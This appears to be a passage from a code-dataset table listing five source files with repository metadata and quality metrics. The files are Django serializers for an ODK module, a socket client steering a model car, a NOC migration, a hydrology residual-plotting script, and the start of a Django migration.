hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
21c4e67bcec2a79afa2f1eebd700ab15449d0b2d | 4,665 | py | Python | aether-odk-module/aether/odk/api/serializers.py | lordmallam/aether | 7ceb71d2ef8b09d704d94dfcb243dbbdf8356135 | [
"Apache-2.0"
] | null | null | null | aether-odk-module/aether/odk/api/serializers.py | lordmallam/aether | 7ceb71d2ef8b09d704d94dfcb243dbbdf8356135 | [
"Apache-2.0"
] | null | null | null | aether-odk-module/aether/odk/api/serializers.py | lordmallam/aether | 7ceb71d2ef8b09d704d94dfcb243dbbdf8356135 | [
"Apache-2.0"
] | null | null | null | # Copyright (C) 2018 by eHealth Africa : http://www.eHealthAfrica.org
#
# See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from django.contrib.auth import get_user_model
from django.contrib.auth.password_validation import validate_password as validate_pwd
from django.utils.translation import ugettext as _
from drf_dynamic_fields import DynamicFieldsMixin
from rest_framework import serializers
from .models import Project, XForm, MediaFile
from .xform_utils import parse_xform_file, validate_xform
from .surveyors_utils import get_surveyors, flag_as_surveyor
class MediaFileSerializer(DynamicFieldsMixin, serializers.ModelSerializer):
name = serializers.CharField(allow_null=True, default=None)
class Meta:
model = MediaFile
fields = '__all__'
class XFormSerializer(DynamicFieldsMixin, serializers.ModelSerializer):
url = serializers.HyperlinkedIdentityField('xform-detail', read_only=True)
project_url = serializers.HyperlinkedRelatedField(
'project-detail',
source='project',
read_only=True
)
surveyors = serializers.PrimaryKeyRelatedField(
label=_('Surveyors'),
many=True,
queryset=get_surveyors(),
allow_null=True,
default=[],
help_text=_('If you do not specify any surveyors, EVERYONE will be able to access this xForm.'),
)
xml_file = serializers.FileField(
write_only=True,
allow_null=True,
default=None,
label=_('XLS Form / XML File'),
help_text=_('Upload an XLS Form or an XML File'),
)
# this will return all media files in one request call
media_files = MediaFileSerializer(many=True, read_only=True)
def validate(self, value):
if value['xml_file']:
try:
# extract data from file and put it on `xml_data`
value['xml_data'] = parse_xform_file(
filename=str(value['xml_file']),
content=value['xml_file'],
)
# validate xml data and link the possible errors to this field
validate_xform(value['xml_data'])
except Exception as e:
raise serializers.ValidationError({'xml_file': str(e)})
value.pop('xml_file')
return super(XFormSerializer, self).validate(value)
class Meta:
model = XForm
fields = '__all__'
class SurveyorSerializer(DynamicFieldsMixin, serializers.ModelSerializer):
password = serializers.CharField(style={'input_type': 'password'})
def validate_password(self, value):
validate_pwd(value)
return value
def create(self, validated_data):
password = validated_data.pop('password', None)
instance = self.Meta.model(**validated_data)
instance.set_password(password)
instance.save()
flag_as_surveyor(instance)
return instance
def update(self, instance, validated_data):
for attr, value in validated_data.items():
if attr == 'password':
if value != instance.password:
instance.set_password(value)
else:
setattr(instance, attr, value)
instance.save()
flag_as_surveyor(instance)
return instance
class Meta:
model = get_user_model()
fields = ('id', 'username', 'password', )
class ProjectSerializer(DynamicFieldsMixin, serializers.ModelSerializer):
url = serializers.HyperlinkedIdentityField('project-detail', read_only=True)
surveyors = serializers.PrimaryKeyRelatedField(
label=_('Surveyors'),
many=True,
queryset=get_surveyors(),
allow_null=True,
default=[],
help_text=_('If you do not specify any surveyors, EVERYONE will be able to access this project xForms.'),
)
# this will return all linked xForms with media files in one request call
xforms = XFormSerializer(read_only=True, many=True)
class Meta:
model = Project
fields = '__all__'
| 33.321429 | 113 | 0.674384 | 537 | 4,665 | 5.709497 | 0.348231 | 0.018265 | 0.019569 | 0.026093 | 0.236791 | 0.221135 | 0.150685 | 0.150685 | 0.119374 | 0.119374 | 0 | 0.002263 | 0.242229 | 4,665 | 139 | 114 | 33.561151 | 0.865064 | 0.198928 | 0 | 0.288889 | 0 | 0 | 0.111709 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044444 | false | 0.1 | 0.088889 | 0 | 0.377778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
21c5953806a590d303da60ce30af9e05c9ffcf7f | 1,046 | py | Python | client.py | Klark007/Selbstfahrendes-Auto-im-Modell | d7fe81392de2b29b7dbc7c9d929fa0031b89900b | [
"MIT"
] | null | null | null | client.py | Klark007/Selbstfahrendes-Auto-im-Modell | d7fe81392de2b29b7dbc7c9d929fa0031b89900b | [
"MIT"
] | null | null | null | client.py | Klark007/Selbstfahrendes-Auto-im-Modell | d7fe81392de2b29b7dbc7c9d929fa0031b89900b | [
"MIT"
] | null | null | null | import socket
from ast import literal_eval
import Yetiborg.Drive as Yetiborg
HEADERSIZE = 2
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 12345)) # 192.168.0.11 / localhost / 192.168.0.108
# car always looks up at the beginning
car = Yetiborg.Yetiborg((0, 1))
"""
fs: finished
"""
def move(vec):
print(vec)
# movement command at motors
car.calculate_movement(vec)
pass
def stop():
print("Stop")
exit()
def command_decoder(str):
# decodes the send command into an action
cmd = str[:2]
if cmd == "mv":
# gets the direction (tuple) from the command
move(literal_eval(str[2:]))
elif cmd == "en":
stop()
pass
while True:
full_cmd = ""
header = s.recv(HEADERSIZE).decode("utf-8")
print("New message length:", header[:HEADERSIZE])
cmd_len = int(header[:HEADERSIZE])
full_cmd = s.recv(cmd_len).decode("utf-8")
command_decoder(full_cmd)
# send finished execution signal
s.send(bytes("fs", "utf-8"))
| 18.350877 | 75 | 0.637667 | 148 | 1,046 | 4.425676 | 0.513514 | 0.032061 | 0.021374 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039555 | 0.226577 | 1,046 | 56 | 76 | 18.678571 | 0.770087 | 0.209369 | 0 | 0.068966 | 0 | 0 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103448 | false | 0.068966 | 0.103448 | 0 | 0.206897 | 0.103448 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
21cf42098efd959d6275b16af7c4990f494ec81b | 859 | py | Python | inv/migrations/0001_subinterface_managed_object.py | prorevizor/noc | 37e44b8afc64318b10699c06a1138eee9e7d6a4e | [
"BSD-3-Clause"
] | 84 | 2017-10-22T11:01:39.000Z | 2022-02-27T03:43:48.000Z | inv/migrations/0001_subinterface_managed_object.py | prorevizor/noc | 37e44b8afc64318b10699c06a1138eee9e7d6a4e | [
"BSD-3-Clause"
] | 22 | 2017-12-11T07:21:56.000Z | 2021-09-23T02:53:50.000Z | inv/migrations/0001_subinterface_managed_object.py | prorevizor/noc | 37e44b8afc64318b10699c06a1138eee9e7d6a4e | [
"BSD-3-Clause"
] | 23 | 2017-12-06T06:59:52.000Z | 2022-02-24T00:02:25.000Z | # ---------------------------------------------------------------------
# Initialize SubInterface.managed_object
# ---------------------------------------------------------------------
# Copyright (C) 2007-2020 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# NOC modules
from noc.core.migration.base import BaseMigration
class Migration(BaseMigration):
def migrate(self):
db = self.mongo_db
# interface oid -> managed object id
imo = {
r["_id"]: r["managed_object"]
for r in db.noc.interfaces.find({}, {"id": 1, "managed_object": 1})
}
# Update subinterface managed object id
c = db.noc.subinterfaces
for i_oid in imo:
c.update({"interface": i_oid}, {"$set": {"managed_object": imo[i_oid]}})
| 35.791667 | 84 | 0.463329 | 82 | 859 | 4.743902 | 0.5 | 0.200514 | 0.128535 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014577 | 0.201397 | 859 | 23 | 85 | 37.347826 | 0.552478 | 0.462165 | 0 | 0 | 0 | 0 | 0.132743 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21d04b45422de71cb56cbdb189ae8ae7a0615c7b | 14,224 | py | Python | utils/etrm_stochastic_grid_search/residual_analysis.py | NMTHydro/Recharge | bbc1a05add92064acffeffb19f04e370b99a7918 | [
"Apache-2.0"
] | 7 | 2016-08-30T15:18:11.000Z | 2021-08-22T00:28:10.000Z | utils/etrm_stochastic_grid_search/residual_analysis.py | NMTHydro/Recharge | bbc1a05add92064acffeffb19f04e370b99a7918 | [
"Apache-2.0"
] | 2 | 2016-06-08T06:41:45.000Z | 2016-06-23T20:47:26.000Z | utils/etrm_stochastic_grid_search/residual_analysis.py | NMTHydro/Recharge | bbc1a05add92064acffeffb19f04e370b99a7918 | [
"Apache-2.0"
] | 1 | 2018-09-18T10:38:08.000Z | 2018-09-18T10:38:08.000Z | # ===============================================================================
# Copyright 2019 Jan Hendrickx and Gabriel Parrish
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
import os
import yaml
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from pandas.plotting import register_matplotlib_converters
register_matplotlib_converters()
from datetime import datetime
# ============= standard library imports ========================
from utils.TAW_optimization_subroutine.timeseries_processor import accumulator
sitename = 'Wjs'
# if applicable
cum_days = '7'
# triggers a specific daterange for plotting specified lower down in script
date_range = True
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/mpj/calibration_output_II/mpj_7day_eta_cum'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/mpj/calibration_output_II/mpj_non_cum_rzsm'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/seg/calibration_output_II/seg_cum_eta_1day'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/seg/calibration_output_II/seg_7day_eta_cum'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/seg/calibration_output_II/seg_non_cum_rzsm'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/ses/calibration_output_II/ses_7day_eta_cum'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/ses/calibration_output_II/ses_non_cum_rzsm'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/wjs/calibration_output_II/wjs_1day_eta_cum'
root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/wjs/calibration_output_II/wjs_cum_eta_7day'#wjs_cum_eta_7day
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/wjs/calibration_output_II/wjs_non_cum_rzsm'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs_II/seg/calibration_output/seg_rzsm'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs_II/mpj/calibration_output/mpj_rzsm'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs_II/vcp/calibration_output/vcp_rzsm'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs_III/wjs/calibration_output/wjs_rzsm'
chimin_path = os.path.join(root, 'US-{}_chimin_cum_eta_{}.yml'.format(sitename, cum_days))
resid_path = os.path.join(root, 'US-{}_resid_cum_eta_{}.yml'.format(sitename, cum_days))
combined_timeseries_file = 'cum_eta_model_df_{}_cum7.csv'
# chimin_path = os.path.join(root, 'US-{}_chimin_non_cum_rzsm.yml'.format(sitename))
# resid_path = os.path.join(root, 'US-{}_resid_non_cum_rzsm.yml'.format(sitename))
# combined_timeseries_file = 'rzsm_model_df_{}.csv'
var = 'ETa'#'ETa' # 'RZSM'
taw = '50'
# starting TAW value
begin_taw = 25
# ending TAW value
end_taw = 925
# grid search step size. Each ETRM run will increase the uniform TAW of the RZSW holding capacity by this many mm.
taw_step = 25
taw_list = []
optimization_dict = {}
for i in range(0, ((end_taw - begin_taw) / taw_step)):
if i == 0:
current_taw = begin_taw
else:
current_taw += taw_step
taw_list.append(current_taw)
with open(chimin_path, 'r') as rfile:
chimin_dict = yaml.load(rfile)
with open(resid_path, 'r') as rfile:
resid_dict = yaml.load(rfile)
print 'residual dict \n', resid_dict
resid_tseries = resid_dict[taw][0]
resid_vals = resid_dict[taw][1]
resid_tseries = [datetime.strptime(str(i)[0:10], '%Y-%m-%d') for i in resid_tseries]
# sort t series greatest to least and keep timeseries there.
resid_sorted = sorted(zip(resid_vals, resid_tseries))
# TODO - Grab the PRISM data for the large values on either end of resid_sorted for the pixel...
combined_timeseries_file = combined_timeseries_file.format(taw)
combined_timeseries_path = os.path.join(root, combined_timeseries_file)
combined_df = pd.read_csv(combined_timeseries_path, parse_dates=True, index_col=0, header=0)
print combined_df.iloc[:, 0]
start_date = datetime(2013, 6, 16)
end_date = datetime(2013, 10, 20)
if date_range:
combined_df = combined_df.loc[(combined_df.index >= start_date) & (combined_df.index <= end_date)]
prism = combined_df['prism_values']
resid_large = resid_sorted[0:4] + resid_sorted[-4:]
# plt.plot(combined_df.index.values, prism)
# plt.plot(combined_df.index.values, combined_df['amf_eta_values'])
# plt.plot(combined_df.index.values, combined_df['average_vals_eta'])
# plt.show()
resid_dates = []
resid_vals = []
for resid_tup in resid_large:
val, dt = resid_tup
# print 'dt {}'.format(dt)
# datetime.datetime(dt)
resid_dates.append(dt)
resid_vals.append(val)
df_datelist = [i for i in combined_df.index]
high_outlier_indices = []
for i, d in enumerate(df_datelist):
# print d.year, d.month, d.day
for res_tup in resid_large:
res_val, res_d = res_tup
if (res_d.year, res_d.month, res_d.day) == (d.year, d.month, d.day):
# print 'resday', (res_d.year, res_d.month, res_d.day), 'dday', (d.year, d.month, d.day)
# if res_d == d:
high_outlier_indices.append(i)
print high_outlier_indices
prism = combined_df['prism_values'].tolist()
site_precip = combined_df['amf_precip_values'].tolist()
# site_precip_dates = pd.to_datetime(combined_df['amf_precip_dates']).tolist()
etrm_et = combined_df['average_vals_eta'].tolist()
amf_et = combined_df['amf_eta_values'].tolist()
if var == 'RZSM':
amf_rzsm = combined_df['nrml_depth_avg_sm'].tolist()
etrm_rzsm = combined_df['average_vals_rzsm'].tolist()
etrm_ro = combined_df['average_vals_ro'].tolist()
data_date = df_datelist
# print 'site precip dates \n', site_precip_dates
data_date = [d.to_pydatetime() for d in data_date]
high_outlier_prism = []
high_outlier_etrm = []
high_outlier_amf = []
high_outlier_dates = []
for oi in high_outlier_indices:
precip_outlier = prism[oi]
etrm_et_outlier = etrm_et[oi]
amf_et_outlier = amf_et[oi]
outlier_date = data_date[oi]
high_outlier_prism.append(precip_outlier)
high_outlier_etrm.append(etrm_et_outlier)
high_outlier_amf.append(amf_et_outlier)
high_outlier_dates.append(outlier_date)
##### ================ RESIDUALS PLOT ========================
ax1 = plt.subplot(411)
ax1.set_title('Largest Normalized Residuals in Timeseires')
ax1.set_xlabel('Date')
ax1.set_ylabel('Residual {}'.format(var))
plt.scatter(resid_dates, resid_vals)
plt.grid()
# plt.setp(ax1.get_xticklabels(), fontsize=6)
if var == 'ETa':
ax2 = plt.subplot(412, sharex=ax1)
ax2.set_title('Ameriflux {} and ETRM {}'.format(sitename, var))
ax2.set_xlabel('Date')
ax2.set_ylabel('ETa in mm')
plt.plot(data_date, etrm_et, color='black', label='ETRM')
plt.plot_date(data_date, etrm_et, color='black', fillstyle='none')
plt.plot(data_date, amf_et, color='green', label='AMF')
plt.plot_date(data_date, amf_et, color='green', fillstyle='none')
plt.grid()
plt.legend(loc=(1.01, 0.5))
# # make these tick labels invisible
# plt.setp(ax2.get_xticklabels(), visible=False)
elif var == 'RZSM':
ax2 = plt.subplot(412, sharex=ax1)
ax2.set_title('Ameriflux {} and ETRM {}'.format(sitename, var))
ax2.set_xlabel('Date')
ax2.set_ylabel('RZSM Fraction')
plt.plot(data_date, etrm_rzsm, color='red', label='ETRM')
plt.plot_date(data_date, etrm_rzsm, color='red', fillstyle='none', label=None)
plt.plot(data_date, amf_rzsm, color='purple', label='AMF')
plt.plot_date(data_date, amf_rzsm, color='purple', fillstyle='none', label=None)
plt.grid()
plt.legend(loc=(1.01, 0.5))
# share x and y
ax3 = plt.subplot(413, sharex=ax1)
ax3.set_title('PRISM and Site {} Precipitation'.format(sitename))
ax3.set_xlabel('Date')
ax3.set_ylabel(('Precipitation in mm'))
plt.plot(data_date, prism, color='blue', label='PRISM')
plt.plot_date(data_date, prism, color='blue', fillstyle='none')
plt.plot(data_date, site_precip, color='orange', label='AMF')
plt.plot_date(data_date, site_precip, color='orange', fillstyle='none')
plt.grid()
plt.legend(loc=(1.01, 0.5))
if var == 'RZSM':
# ax4 = plt.subplot(414, sharex=ax1)
# ax4.set_title('ETRM {} Runoff'.format(sitename))
# ax4.set_xlabel('Date')
# ax4.set_ylabel('ETRM Runoff in mm')
# plt.plot(data_date, etrm_ro, color='brown', label='Runoff')
# plt.plot_date(data_date, etrm_ro, color='brown', fillstyle='none')
# plt.grid()
# plt.legend(loc=(1.01, 0.5))
# =====
ax4 = plt.subplot(414, sharex=ax1)
ax4.set_title('Ameriflux {} and ETRM {}'.format(sitename, var))
ax4.set_xlabel('Date')
ax4.set_ylabel('ETa in mm')
plt.plot(data_date, etrm_et, color='black', label='ETRM')
plt.plot_date(data_date, etrm_et, color='black', fillstyle='none')
plt.plot(data_date, amf_et, color='green', label='AMF')
plt.plot_date(data_date, amf_et, color='green', fillstyle='none')
plt.grid()
plt.legend(loc=(1.01, 0.5))
plt.subplots_adjust(hspace=.75) # left, right, bottom, top, wspace, hspace
plt.show()
# ================== PLOTTING INFILTRATION ==================
etrm_infil = combined_df['average_vals_infil'].tolist()
ax1 = plt.subplot(311)
ax1.set_title('infil_timeseries')
ax1.set_xlabel('Date')
ax1.set_ylabel('infiltration {} TAW'.format(var, taw))
plt.plot(data_date, etrm_infil, color='black', label='ETRM')
plt.plot_date(data_date, etrm_infil, color='black', fillstyle='none')
plt.grid()
ax2 = plt.subplot(312, sharex=ax1)
ax2.set_title('Ameriflux {} and ETRM {}'.format(sitename, var))
ax2.set_xlabel('Date')
ax2.set_ylabel('ETa in mm')
plt.plot(data_date, etrm_et, color='black', label='ETRM')
plt.plot_date(data_date, etrm_et, color='black', fillstyle='none')
plt.plot(data_date, amf_et, color='green', label='AMF')
plt.plot_date(data_date, amf_et, color='green', fillstyle='none')
plt.grid()
plt.legend(loc=(1.01, 0.5))
ax3 = plt.subplot(313, sharex=ax1)
ax3.set_title('PRISM and Site {} Precipitation'.format(sitename))
ax3.set_xlabel('Date')
ax3.set_ylabel(('Precipitation in mm'))
plt.plot(data_date, prism, color='blue', label='PRISM')
plt.plot_date(data_date, prism, color='blue', fillstyle='none')
plt.plot(data_date, site_precip, color='orange', label='AMF')
plt.plot_date(data_date, site_precip, color='orange', fillstyle='none')
plt.grid()
plt.legend(loc=(1.01, 0.5))
plt.subplots_adjust(hspace=.75)
plt.show()
# ========================== Plotting Sans Residuals =======================
# plt.setp(ax1.get_xticklabels(), fontsize=6)
if var == 'ETa':
ax2 = plt.subplot(311)
ax2.set_title('Ameriflux {} and ETRM {}'.format(sitename, var))
ax2.set_xlabel('Date')
ax2.set_ylabel('ETa in mm')
plt.plot(data_date, etrm_et, color='black', label='ETRM')
plt.plot_date(data_date, etrm_et, color='black', fillstyle='none')
plt.plot(data_date, amf_et, color='green', label='AMF')
plt.plot_date(data_date, amf_et, color='green', fillstyle='none')
plt.grid()
plt.legend(loc=(1.01, 0.5))
# # make these tick labels invisible
# plt.setp(ax2.get_xticklabels(), visible=False)
elif var == 'RZSM':
ax2 = plt.subplot(311)
ax2.set_title('Ameriflux {} and ETRM {}'.format(sitename, var))
ax2.set_xlabel('Date')
ax2.set_ylabel('RZSM Fraction')
plt.plot(data_date, etrm_rzsm, color='red', label='ETRM')
plt.plot_date(data_date, etrm_rzsm, color='red', fillstyle='none', label=None)
plt.plot(data_date, amf_rzsm, color='purple', label='AMF')
plt.plot_date(data_date, amf_rzsm, color='purple', fillstyle='none', label=None)
plt.grid()
plt.legend(loc=(1.01, 0.5))
# share x and y
ax3 = plt.subplot(312, sharex=ax2)
ax3.set_title('PRISM and Site {} Precipitation'.format(sitename))
ax3.set_xlabel('Date')
ax3.set_ylabel(('Precipitation in mm'))
plt.plot(data_date, prism, color='blue', label='PRISM')
plt.plot_date(data_date, prism, color='blue', fillstyle='none')
plt.plot(data_date, site_precip, color='orange', label='AMF')
plt.plot_date(data_date, site_precip, color='orange', fillstyle='none')
plt.grid()
plt.legend(loc=(1.01, 0.5))
if var == 'RZSM':
# ax4 = plt.subplot(313, sharex=ax2)
# ax4.set_title('ETRM {} Runoff'.format(sitename))
# ax4.set_xlabel('Date')
# ax4.set_ylabel('ETRM Runoff in mm')
# plt.plot(data_date, etrm_ro, color='brown', label='Runoff')
# plt.plot_date(data_date, etrm_ro, color='brown', fillstyle='none')
# plt.grid()
# plt.legend(loc=(1.01, 0.5))
# =====
ax4 = plt.subplot(313, sharex=ax2)
ax4.set_title('Ameriflux {} and ETRM {}'.format(sitename, var))
ax4.set_xlabel('Date')
ax4.set_ylabel('ETa in mm')
plt.plot(data_date, etrm_et, color='black', label='ETRM')
plt.plot_date(data_date, etrm_et, color='black', fillstyle='none')
plt.plot(data_date, amf_et, color='green', label='AMF')
plt.plot_date(data_date, amf_et, color='green', fillstyle='none')
plt.grid()
plt.legend(loc=(1.01, 0.5))
else:
ax4 = plt.subplot(313, sharex=ax2)
ax4.set_title('ETRM {} Runoff'.format(sitename))
ax4.set_xlabel('Date')
ax4.set_ylabel('ETRM Runoff in mm')
plt.plot(data_date, etrm_ro, color='brown', label='Runoff')
plt.plot_date(data_date, etrm_ro, color='brown', fillstyle='none')
plt.grid()
plt.legend(loc=(1.01, 0.5))
plt.subplots_adjust(hspace=.5) # left, right, bottom, top, wspace, hspace
plt.show() | 37.729443 | 147 | 0.710911 | 2,165 | 14,224 | 4.430947 | 0.143187 | 0.043365 | 0.031273 | 0.037527 | 0.647451 | 0.630251 | 0.613677 | 0.601584 | 0.573022 | 0.564266 | 0 | 0.0197 | 0.122118 | 14,224 | 377 | 148 | 37.729443 | 0.748538 | 0.335208 | 0 | 0.531818 | 0 | 0 | 0.143925 | 0.021567 | 0 | 0 | 0 | 0.002653 | 0 | 0 | null | null | 0 | 0.036364 | null | null | 0.013636 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21d487a575334245b8424e08a0ec1c4d3a7ff96b | 672 | py | Python | src/person/migrations/0004_actors_moved.py | Little-Pogchamp-Team/kinopoisk_on_django | 06e1b5ee14c7e77dd5b69140732461a02bf44566 | [
"MIT"
] | 10 | 2021-01-10T09:39:16.000Z | 2022-02-05T06:40:47.000Z | src/person/migrations/0004_actors_moved.py | Little-Pogchamp-Team/kinopoisk_on_django | 06e1b5ee14c7e77dd5b69140732461a02bf44566 | [
"MIT"
] | null | null | null | src/person/migrations/0004_actors_moved.py | Little-Pogchamp-Team/kinopoisk_on_django | 06e1b5ee14c7e77dd5b69140732461a02bf44566 | [
"MIT"
] | 1 | 2021-01-11T17:04:06.000Z | 2021-01-11T17:04:06.000Z | # Generated by Django 3.1.5 on 2021-03-22 17:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('movies', '0010_actors_moved'),
('person', '0003_refactoring_movie_person_m2m_rels'),
]
operations = [
migrations.AddField(
model_name='person',
name='movies',
field=models.ManyToManyField(related_name='persons', through='person.PersonRole', to='movies.Movie'),
),
migrations.AddField(
